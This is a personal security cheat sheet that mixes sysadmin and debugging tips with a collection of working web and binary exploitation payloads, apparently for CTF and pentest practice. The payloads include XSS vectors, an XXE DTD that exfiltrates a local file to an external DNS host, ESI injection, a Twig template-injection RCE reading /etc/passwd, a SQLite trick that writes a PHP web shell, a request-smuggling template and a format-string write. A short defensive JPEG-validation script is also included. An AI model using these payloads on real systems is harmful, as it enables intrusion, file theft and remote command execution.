for my private purposes :)
- Burp Suite Professional
- Docker
- Ubuntu
- Web Applications Security
- Network
- /dev/null
- low-level
- IDA PRO
- Heap Exploitation
java -Xms10m -Xmx200m -XX:GCTimeRatio=19 -jar burp.jar --collaborator-server
Non-standard ports:
Configuration file: --collaborator-config=myconfig.config
- https://portswigger.net/burp/documentation/collaborator/deploying#running-on-non-standard-ports
- https://portswigger.net/burp/documentation/collaborator/deploying#collaborator-configuration-file-format
docker build -t name .
docker container prune
docker image prune
$ docker container stop $(docker container ls -aq)
$ docker container rm $(docker container ls -aq)
Show locales:
locale -a
Show default locales:
cat /etc/default/locale
Install Polish locale:
sudo locale-gen pl_PL.utf8
Set up the default locale:
update-locale LANG=pl_PL.utf8
# Enable at boot:
sudo systemctl enable wg-quick@wg0.service
sudo systemctl daemon-reload
# Run:
sudo systemctl start wg-quick@wg0
# Check status:
systemctl status wg-quick@wg0
Some helpful payloads caught in the wild
<svG x=1 onload=(co\u006efirm)``//
<embed src=//14.rs>
<marquee loop=1 width=0 onfinish=confirm(1)>
<marquee/onstart=alert(1)>
<esi:include src="http://abcdef.burpcollaborator.net/" /><script>alert(1)</script>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=javascript:alert(document.location)>
<svg><a><animate attributeName=href to=javascript:alert(document.location) /><text y=15>Click me!</text></a>
DTD file without .dtd extension (test.html):
<!ENTITY % file SYSTEM "file:///etc/flag">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://%file;.b0f4f2d1d89d4ec413ad.d.zhack.ca'>">
%eval;
%exfiltrate;
Injection:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///tmp/test.html"> %xxe;]>
SVG LFI (ImageMagick):
https://blog.bushwhackers.ru/googlectf-2019-gphotos-writeup/
<?xml version="1.0" encoding="UTF-8"?>
<svg width="1200px" height="1200px">
<image width="1200" height="1200" href="text:/etc/hosts" />
</svg>
Edge Side Include Injection
WAF-like bypass:
<svg<!--esi--> onload=aler<!--esi-->t<!--esi-->``
If he<!--esi-->llo -> hello
but he<!--esx-->llo isn't modified,
you have ESI injection
<esi:include src="/anypage.html" dca="none" />
XSS
<esi:include src="http://abcdef.burpcollaborator.net/" /><script>alert(1)</script>
- https://twitter.com/alxbrsn/status/981256374230319112
- https://t.co/XRxIalWcng?amp=1
- https://t.co/vzRIo3RuaR?amp=1
- https://www.slideshare.net/cisoplatform7/edge-side-include-injection-abusing-caching-servers-into-ssrf-and-transparent-session-hijacking
Twig3 RCE:
{{['cat${IFS}/etc/passwd']|filter('system')}}
TE.CL + Hackvertor
(disable "Update Content-Length" in Repeater and "Auto Update Content Length" in Hackvertor settings)
POST / HTTP/1.1
Host: abc.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 3
<@chunked_dec2hex_4><@get_var_3 /><@/chunked_dec2hex_4>
<@set_var_1><@length_2>GPOST / HTTP/1.1
Host: abc.com
Content-Length: 15
x=1<@/length_2><@/set_var_1>
0
JSON escape:
<@python_4("import json;output = json.dumps(input)","7d808063a7c69f9dad4f4a3cb1c2bd1a")>test123'<>"<@/python_4>
Result: "test123'<>\""
Connect:
$ sqlite3 test.db
Command execution:
ATTACH DATABASE '/var/www/html/y.php' AS y;--
CREATE TABLE y.p (dataz text);--
INSERT INTO y.p (dataz) VALUES ('<? system($_GET[''cmd'']);?>');--
SELECT * FROM sys.x$schema_flattened_keys;
Blind SQL Injection without IN:
https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
// After Upload:
echo (new finfo)->file($_FILES["fileToUpload"]["tmp_name"]);
//Rendered:
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, comment: "AAAAAAAAAAAAAAAAAA"
/*
Uploaded file:
$ cat test1234.txt | base64
/9j/4AAQSkZJRgABAgAAAQABAAD//kFBQUFBQUFBQUFBQUFBQUFBQUFB
*/
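As an added defender-side example (not part of the original notes), this Python walks the JPEG segment structure of the uploaded blob above and shows why the finfo/libmagic verdict is only a magic-byte check: the file passes it while containing no frame header (SOFn) or scan (SOS), just an APP0 header and an oversized COM segment. The SKELETON sample and all function names are constructed here.

```python
import base64
import struct

# Constructed sample: the 42-byte "JPEG" from the upload note above
# (SOI, APP0/JFIF header, then a COM marker followed by twenty 'A's).
SAMPLE_B64 = "/9j/4AAQSkZJRgABAgAAAQABAAD//kFBQUFBQUFBQUFBQUFBQUFBQUFB"
SAMPLE = base64.b64decode(SAMPLE_B64)

# Constructed minimal skeleton that has the segments a real image needs:
# SOI, SOF0 (8-bit, 1x1, one component), SOS, one byte of scan data, EOI.
SKELETON = (b"\xff\xd8"
            + b"\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00"
            + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
            + b"\x00"
            + b"\xff\xd9")

SOS = 0xDA
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}


def looks_like_jpeg(data: bytes) -> bool:
    """The check finfo/libmagic effectively performs: leading magic bytes only."""
    return data[:3] == b"\xff\xd8\xff"


def walk_segments(data: bytes):
    """Return (markers, truncated): markers seen up to SOS, and whether a
    declared segment length overruns the file or a marker byte is missing."""
    if data[:2] != b"\xff\xd8":
        return [], True
    pos, markers = 2, []
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return markers, True          # garbage where a marker should be
        marker = data[pos + 1]
        markers.append(marker)
        if marker == SOS:
            return markers, False         # entropy-coded scan data follows
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + length                 # length field counts itself
    return markers, pos != len(data)      # ran out of file before SOS


def is_structurally_valid_jpeg(data: bytes) -> bool:
    """Require a frame header, a scan and a trailing EOI, not just magic bytes."""
    markers, truncated = walk_segments(data)
    return (not truncated
            and any(m in SOF_MARKERS for m in markers)
            and SOS in markers
            and data[-2:] == b"\xff\xd9")
```

For real uploads, re-encoding the image with a decoder is the stronger check; the structural walk is the cheap first gate.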
- RCE Telerik https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui
- https://github.com/noperator/CVE-2019-18935
- https://github.com/Illuminopi/RCEvil.NET/
route get 192.168.13.14
while true; do
echo -e "HTTP/1.1 200 OK\n\n $(date)" | nc -l -p 1500 -q 1
done
:set background=dark
permanently:
echo 'set background=dark' >> $HOME/.vimrc
:set number
:set mouse=a
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --stop
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --config
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --start
Check your current status:
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --status
ldd --version
>>> hex(-199703103 & (2**32-1)) # 32-bit
'0xf418c5c1L'
>>> hex(-199703103 & (2**64-1)) # 64-bit
'0xfffffffff418c5c1L'
(Python 2 output; Python 3 prints the same values without the trailing L)
$ ldd -r -v aerofloat
linux-vdso.so.1 (0x00007ffce8bf5000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcbeeced000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcbef0de000)
Version information:
./aerofloat:
libc.so.6 (GLIBC_2.7) => /lib/x86_64-linux-gnu/libc.so.6
libc.so.6 (GLIBC_2.2.5) => /lib/x86_64-linux-gnu/libc.so.6
/lib/x86_64-linux-gnu/libc.so.6:
ld-linux-x86-64.so.2 (GLIBC_2.3) => /lib64/ld-linux-x86-64.so.2
ld-linux-x86-64.so.2 (GLIBC_PRIVATE) => /lib64/ld-linux-x86-64.so.2
p = process('./aerofloat', env = {'LD_PRELOAD' : './libc.so.6 ./ld-linux-x86-64.so.2'})
puts@plt(puts@got)
puts@plt:
0x0000000000401030 <+0>: jmp QWORD PTR [rip+0x2fe2] # 0x404018
0x040430(*0x04018),
0x04018 = 0x7f......
>>> struct.pack("<L", 0x401192).decode()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x92 in position 0: invalid start byte
>>> struct.pack("<L", 0x401192).decode("utf-8", "backslashreplace")
'\\x92\x11@\x00'
e.g.: (https://docs.python.org/3/howto/unicode.html)
handle SIGHUP noprint nostop pass
set follow-fork-mode command controls the behavior of GDB when the debugged program calls fork() or vfork()
set follow-fork-mode parent
set follow-fork-mode child
show follow-fork-mode
pwndbg> dumpargs
format: 0xffffdb2c ◂— 'test\n'
vararg: 0x20
pwndbg> xinfo 0x80490a0
Extended information for virtual address 0x80490a0:
Containing mapping:
0x8049000 0x804a000 r-xp 1000 1000 /mnt/hgfs/LEARN/xx/binary/binary
Offset information:
Mapped Area 0x80490a0 = 0x8049000 + 0xa0
File (Base) 0x80490a0 = 0x8048000 + 0x10a0
File (Segment) 0x80490a0 = 0x8049000 + 0xa0
File (Disk) 0x80490a0 = /mnt/hgfs/LEARN/xx/binary/binary + 0x10a0
Containing ELF sections:
.plt.got 0x80490a0 = 0x80490a0 + 0x0
pwndbg> search -t pointer 0x804b398
binary 0x8048394 0x804b398
binary 0x80490a2 cwde
[heap] 0x8e76570 0x804b398
[heap] 0x8e76574 0x804b398
[stack] 0xffa8007c 0x804b398
[stack] 0xffa80080 0x804b398
>>> from pwn import *
>>> fmtstr_payload(71, {0x804b398: 0x38}, write_size='byte')
b'%56c%74$naaa\x98\xb3\x04\x08'
To avoid the 00 00 bytes written by %n with the write_size above, use %hhn instead:
b'%56c%74$hhna\x98\xb3\x04\x08'
- https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf (IDA PRO shortcuts)
- https://www.unknowncheats.me/wiki/How_to_use_IDA_Pro_efficiently (How to use IDA PRO efficiently)
- https://malwareunicorn.org/workshops/idacheatsheet.html (IDA PRO cheatsheet)
- After tcache is filled, the free memory is placed in fastbin or unsorted bin as before. (https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/tcache/)
- tcache bins can only hold 7 entries at a time. (https://drive.google.com/file/d/1XpdruvtC1qW0OKLxO8FaqU9XCl8O_SON/view)